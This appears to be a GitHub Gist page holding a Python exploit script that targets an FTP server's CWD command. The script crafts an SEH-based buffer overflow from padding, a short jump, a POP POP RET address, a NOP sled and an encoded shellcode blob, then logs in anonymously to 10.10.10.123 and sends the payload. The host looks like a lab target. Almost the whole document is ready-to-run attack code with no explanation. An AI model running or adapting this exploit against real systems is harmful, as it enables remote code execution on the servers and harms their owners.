Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
import socket
# addresses (POP POP RET)
pop = b"\xa2\x15\x20\x12"
# instructions (JMP 0xC)
jmp = b"\xeb\x0c\x90\x90"
# shellcode
buf = b""
buf += b"\xba\x70\xf1\x54\x77\xdd\xc0\xd9\x74\x24\xf4\x5e\x33"
buf += b"\xc9\xb1\x67\x31\x56\x12\x83\xee\xfc\x03\x26\xff\xb6"
buf += b"\x82\x79\xae\xfa\x17\x31\x8b\xd0\x31\x4d\x08\x23\x9c"
buf += b"\x84\x99\x7a\x7f\x55\xdc\x79\xb1\x24\xd0\x82\xcc\x88"
buf += b"\xc0\x0b\x47\x95\x0e\x09\x1b\xfc\x96\x36\xcc\xf3\x14"
buf += b"\xd8\xd9\x8f\x02\x51\xd1\x59\xec\x39\x4a\xa6\xee\x4d"
buf += b"\xb6\x4c\xf6\x46\xd8\x36\x37\x55\xfb\xc2\x2e\x8c\x1c"
buf += b"\xe9\xf5\x58\x2f\x2d\x78\x5a\x1f\x93\x79\x9c\x44\x3c"
buf += b"\xb9\xf1\xbe\x02\x8b\x26\x8e\xba\x35\x6a\xc9\xa7\xd3"
buf += b"\x06\x6e\xf3\x29\x14\xd9\x15\xe5\xc2\x0f\xb2\x38\x69"
buf += b"\x23\xdc\xc3\xba\x80\x45\xfb\x0a\xdc\x27\xa3\xbb\x01"
buf += b"\x58\x18\xfd\xb1\x99\x70\xc5\x09\xb4\x85\x60\xc9\x06"
buf += b"\x4f\x66\x6d\xb1\x38\x42\x10\x8c\x85\x50\xe2\x44\x43"
buf += b"\xdf\xd4\xea\x47\x12\xfa\x9f\x54\xba\x44\xed\xca\x8d"
buf += b"\x99\x4d\xaa\xb8\xa8\xcf\xfc\x06\xdd\x8f\x93\xf7\x2d"
buf += b"\x12\x3a\xd2\x5d\x04\x08\xb8\x4f\x08\x95\x64\x66\x90"
buf += b"\x81\xf6\x34\x34\x51\x40\xb1\x8d\x66\xfa\x1e\x11\xb3"
buf += b"\xc4\x63\x21\xea\x98\xdf\x32\x71\x74\x45\xf0\xd5\x6f"
buf += b"\xb9\x4d\x8a\x55\xaf\xf9\x46\x19\x64\xca\xfc\x66\x15"
buf += b"\x7b\x16\x65\x73\x3a\x3d\x3e\xb4\x97\xe6\x85\x43\xea"
buf += b"\x3f\x4c\x20\x50\x26\xe2\x9c\x9d\x48\xa3\x4b\x8d\xce"
buf += b"\x81\xc0\x10\x3c\xb8\xa7\xbd\x0e\xaf\x88\xee\x12\xf9"
buf += b"\xd8\x87\x54\x53\x8d\x57\xee\x53\xfe\xbb\x40\xb5\x25"
buf += b"\x59\x0c\x5d\x2c\x10\x3e\x36\xe6\x99\x11\x86\x18\x08"
buf += b"\x6e\x3b\xf7\xa8\x99\x5b\x40\x3b\x41\xaf\x5b\x2f\x11"
buf += b"\x1d\x9d\xe1\x17\x2d\x6d\xd9\x8d\xe7\x95\x90\xaa\x87"
buf += b"\xb8\xa8\x64\x86\xd2\xb3\xd8\x9a\xd4\xb7\xc9\x76\xef"
buf += b"\x46\x44\x8b\x92\x1d\x9e\x10\xc6\x0d\x97\xa9\x0e\x88"
buf += b"\xa2\x49\xce\x36\x3a\xe3\x53\x1e\xbf\x09\xef\xca\x79"
buf += b"\xb1\xdb\xce\x30\x70\x25\xba\xf3\x37\xca\xe6\x3b\xdc"
buf += b"\x06\x62\xec\x54\xae\x86\x45\x76\x96\x73\xf4\xdd\xad"
buf += b"\x99\x91\x03\x07\x39\x79\x43\x1a\x3c\xdc\x98\x97\xc9"
buf += b"\x38\x9c\x44\x05\x3b\xaa\xcf\xad\xda\x67\x42\x54\xf7"
buf += b"\x26\x32\x8a\xf3\x75\x72"
exploit_payload = (b'A' * 1037) + jmp + pop + (b'\x90' * 8) + b'CCCC' + (b'\x90' * 30) + buf + (b'D' * 1500) + b'\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.10.123", 21))
_ = s.recv(1024)
s.send(b'USER anonymous\r\n')
_ = s.recv(1024)
s.send(b'PASS anonymous\r\n')
_ = s.recv(1024)
s.send(b'CWD ' + exploit_payload + b'\r\n')
s.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment